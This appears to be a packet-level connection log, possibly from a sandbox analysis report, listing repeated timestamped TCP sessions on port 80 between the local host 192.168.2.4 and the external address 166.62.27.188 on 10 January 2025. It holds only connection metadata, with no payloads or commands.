Jan 10, 2025 08:59:40.476125002 CET	49796	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.476210117 CET	49796	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.480984926 CET	80	49796	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:41.376718998 CET	80	49796	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:41.376763105 CET	80	49796	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:41.377156019 CET	49796	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.377408028 CET	49796	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.382297993 CET	80	49796	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:41.518536091 CET	49802	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.523539066 CET	80	49802	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:41.523627043 CET	49802	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.523750067 CET	49802	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.526150942 CET	49803	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.528712988 CET	80	49802	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:41.528776884 CET	49802	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.531028032 CET	80	49803	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:41.531088114 CET	49803	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.531194925 CET	49803	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:41.536011934 CET	80	49803	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:42.451180935 CET	80	49803	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:42.451730013 CET	80	49803	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:42.451807976 CET	49803	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.454595089 CET	49803	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.459439039 CET	80	49803	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:42.591245890 CET	49814	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.596218109 CET	80	49814	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:42.597306013 CET	49814	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.598483086 CET	49814	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.603394032 CET	80	49814	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:42.603471041 CET	49814	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.603908062 CET	49815	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.608822107 CET	80	49815	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:42.608906031 CET	49815	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.609934092 CET	49815	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:42.614716053 CET	80	49815	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:43.526401997 CET	80	49815	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:43.526887894 CET	80	49815	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:43.526983023 CET	49815	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.527445078 CET	49815	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.532387018 CET	80	49815	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:43.654165030 CET	49821	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.659173965 CET	80	49821	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:43.659250975 CET	49821	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.659373045 CET	49821	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.661230087 CET	49822	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.664366007 CET	80	49821	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:43.666193008 CET	80	49822	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:43.666295052 CET	49822	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.666394949 CET	49822	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.666400909 CET	49821	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:43.671231985 CET	80	49822	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:44.599970102 CET	80	49822	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:44.600116968 CET	80	49822	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:44.600181103 CET	49822	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.600274086 CET	49822	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.605046988 CET	80	49822	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:44.727484941 CET	49829	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.732388973 CET	80	49829	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:44.732453108 CET	49829	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.732587099 CET	49829	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.734299898 CET	49831	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.737482071 CET	80	49829	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:44.737555027 CET	49829	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.739115000 CET	80	49831	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:44.739193916 CET	49831	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.739330053 CET	49831	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:44.744225025 CET	80	49831	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:45.662324905 CET	80	49831	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:45.662525892 CET	80	49831	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:45.662584066 CET	49831	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.662684917 CET	49831	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.667525053 CET	80	49831	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:45.789253950 CET	49840	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.794986010 CET	80	49840	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:45.795079947 CET	49840	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.795224905 CET	49840	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.797058105 CET	49841	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.800816059 CET	80	49840	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:45.800883055 CET	49840	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.801956892 CET	80	49841	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:45.802026033 CET	49841	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.802113056 CET	49841	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:45.806864023 CET	80	49841	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:46.733742952 CET	80	49841	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:46.734123945 CET	80	49841	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:46.734201908 CET	49841	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.734271049 CET	49841	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.739073992 CET	80	49841	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:46.863362074 CET	49846	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.868231058 CET	80	49846	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:46.868299007 CET	49846	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.868387938 CET	49846	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.873393059 CET	80	49846	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:46.873442888 CET	49846	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.893224001 CET	49847	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.898103952 CET	80	49847	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:46.898188114 CET	49847	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.898849010 CET	49847	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:46.903728962 CET	80	49847	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:47.802615881 CET	80	49847	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:47.802870035 CET	80	49847	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:47.803483963 CET	49847	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.803546906 CET	49847	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.808413982 CET	80	49847	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:47.941131115 CET	49854	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.946209908 CET	80	49854	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:47.946309090 CET	49854	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.946441889 CET	49854	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.948734045 CET	49855	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.951378107 CET	80	49854	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:47.951445103 CET	49854	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.953588963 CET	80	49855	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:47.953666925 CET	49855	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.953768015 CET	49855	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:47.959094048 CET	80	49855	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:48.886893034 CET	80	49855	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:48.887109995 CET	80	49855	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:48.887326956 CET	49855	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:48.887326956 CET	49855	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:48.892322063 CET	80	49855	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:49.013771057 CET	49862	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.018821001 CET	80	49862	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:49.018914938 CET	49862	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.019107103 CET	49862	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.021204948 CET	49863	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.024069071 CET	80	49862	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:49.024255991 CET	49862	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.026108027 CET	80	49863	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:49.026216030 CET	49863	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.026380062 CET	49863	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.031254053 CET	80	49863	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:49.953263998 CET	80	49863	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:49.953603983 CET	80	49863	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:49.953699112 CET	49863	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.953799963 CET	49863	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:49.958628893 CET	80	49863	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:50.102443933 CET	49871	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:50.107444048 CET	80	49871	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:50.107527018 CET	49871	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:50.107640982 CET	49871	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:50.110539913 CET	49872	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:50.112576962 CET	80	49871	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:50.112649918 CET	49871	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:50.115405083 CET	80	49872	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:50.115478992 CET	49872	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:50.115751028 CET	49872	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:50.120529890 CET	80	49872	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:51.061712027 CET	80	49872	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:51.061755896 CET	80	49872	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:51.061816931 CET	49872	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.062005997 CET	49872	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.066855907 CET	80	49872	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:51.190443039 CET	49881	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.195837021 CET	80	49881	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:51.196005106 CET	49881	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.196187973 CET	49881	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.198301077 CET	49882	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.201158047 CET	80	49881	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:51.201220989 CET	49881	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.203244925 CET	80	49882	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:51.203341007 CET	49882	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.203576088 CET	49882	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:51.208394051 CET	80	49882	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:52.122479916 CET	80	49882	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:52.122814894 CET	80	49882	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:52.122908115 CET	49882	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.122908115 CET	49882	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.127856970 CET	80	49882	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:52.252088070 CET	49888	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.257047892 CET	80	49888	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:52.257173061 CET	49888	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.257230997 CET	49888	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.259258032 CET	49889	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.262293100 CET	80	49888	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:52.262362003 CET	49888	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.264200926 CET	80	49889	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:52.264293909 CET	49889	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.264478922 CET	49889	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:52.269355059 CET	80	49889	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:53.167829037 CET	80	49889	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:53.168195009 CET	80	49889	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:53.168384075 CET	49889	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.168385029 CET	49889	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.173270941 CET	80	49889	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:53.294641972 CET	49899	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.299529076 CET	80	49899	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:53.301980019 CET	49899	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.302037954 CET	49899	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.303714037 CET	49900	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.307044029 CET	80	49899	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:53.308592081 CET	80	49900	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:53.308669090 CET	49899	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.308691978 CET	49900	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.316425085 CET	49900	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:53.321342945 CET	80	49900	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:54.246026993 CET	80	49900	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:54.246408939 CET	80	49900	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:54.246457100 CET	49900	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.246547937 CET	49900	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.251324892 CET	80	49900	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:54.378401041 CET	49907	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.383266926 CET	80	49907	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:54.383348942 CET	49907	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.383460045 CET	49907	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.385371923 CET	49908	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.388329983 CET	80	49907	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:54.388384104 CET	49907	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.390213013 CET	80	49908	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:54.390285015 CET	49908	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.390418053 CET	49908	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:54.395190954 CET	80	49908	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:55.323048115 CET	80	49908	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:55.323545933 CET	80	49908	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:55.324433088 CET	49908	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.324517965 CET	49908	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.329348087 CET	80	49908	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:55.450113058 CET	49915	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.455107927 CET	80	49915	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:55.455195904 CET	49915	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.455290079 CET	49915	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.457042933 CET	49916	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.460155010 CET	80	49915	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:55.460164070 CET	80	49915	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:55.460237980 CET	49915	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.461865902 CET	80	49916	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:55.461927891 CET	49916	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.462063074 CET	49916	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:55.466897011 CET	80	49916	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:56.411364079 CET	80	49916	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:56.411377907 CET	80	49916	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:56.411514997 CET	49916	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.411607027 CET	49916	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.416407108 CET	80	49916	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:56.539077997 CET	49924	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.544028997 CET	80	49924	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:56.548541069 CET	49924	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.557034969 CET	49924	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.563271046 CET	80	49924	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:56.564889908 CET	49924	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.574644089 CET	49925	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.581026077 CET	80	49925	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:56.586007118 CET	49925	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.587902069 CET	49925	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:56.593622923 CET	80	49925	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:57.503993988 CET	80	49925	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:57.504230022 CET	80	49925	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:57.504287004 CET	49925	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.504347086 CET	49925	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.509123087 CET	80	49925	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:57.631299973 CET	49933	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.636143923 CET	80	49933	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:57.636209965 CET	49933	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.636415958 CET	49933	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.641235113 CET	80	49933	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:57.641289949 CET	49933	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.658691883 CET	49934	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.663592100 CET	80	49934	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:57.663656950 CET	49934	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.663830042 CET	49934	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:57.668606043 CET	80	49934	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:58.616508961 CET	80	49934	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:58.616714001 CET	80	49934	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:58.617436886 CET	49934	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.617436886 CET	49934	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.622371912 CET	80	49934	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:58.743194103 CET	49942	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.748440027 CET	80	49942	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:58.748600006 CET	49942	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.748799086 CET	49942	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.754688978 CET	80	49942	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:58.754767895 CET	49942	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.755203009 CET	49944	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.759980917 CET	80	49944	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:58.760070086 CET	49944	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.760201931 CET	49944	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:58.765227079 CET	80	49944	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:59.679389954 CET	80	49944	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:59.679774046 CET	80	49944	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:59.679862022 CET	49944	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.679945946 CET	49944	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.687160015 CET	80	49944	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:59.807259083 CET	49952	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.812091112 CET	80	49952	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:59.812455893 CET	49952	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.812575102 CET	49952	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.814306974 CET	49953	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.817419052 CET	80	49952	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:59.819152117 CET	80	49953	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:59.819205046 CET	49952	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.819235086 CET	49953	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.819346905 CET	49953	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:59.824145079 CET	80	49953	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:00.750742912 CET	80	49953	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:00.751147032 CET	80	49953	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:00.751303911 CET	49953	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.752949953 CET	49953	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.757714987 CET	80	49953	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:00.883213997 CET	49961	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.888215065 CET	80	49961	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:00.888293982 CET	49961	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.888391972 CET	49961	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.890187025 CET	49962	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.893515110 CET	80	49961	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:00.893578053 CET	49961	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.895045042 CET	80	49962	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:00.895195961 CET	49962	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.895227909 CET	49962	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:00.899969101 CET	80	49962	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:01.827510118 CET	80	49962	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:01.828140020 CET	80	49962	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:01.828229904 CET	49962	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.828300953 CET	49962	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.833064079 CET	80	49962	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:01.955524921 CET	49970	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.960397005 CET	80	49970	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:01.960488081 CET	49970	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.960603952 CET	49970	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.962471962 CET	49971	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.965662956 CET	80	49970	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:01.965730906 CET	49970	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.967402935 CET	80	49971	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:01.967478037 CET	49971	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.967549086 CET	49971	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:01.972325087 CET	80	49971	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:02.918051004 CET	80	49971	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:02.918123007 CET	80	49971	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:02.918183088 CET	49971	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:02.918289900 CET	49971	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:02.923764944 CET	80	49971	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:03.034899950 CET	49979	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.040637970 CET	80	49979	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:03.040698051 CET	49979	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.040807009 CET	49979	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.042545080 CET	49980	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.046785116 CET	80	49979	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:03.046850920 CET	49979	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.048413992 CET	80	49980	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:03.048470020 CET	49980	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.048578024 CET	49980	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.053344011 CET	80	49980	166.62.27.188	192.168.2.4
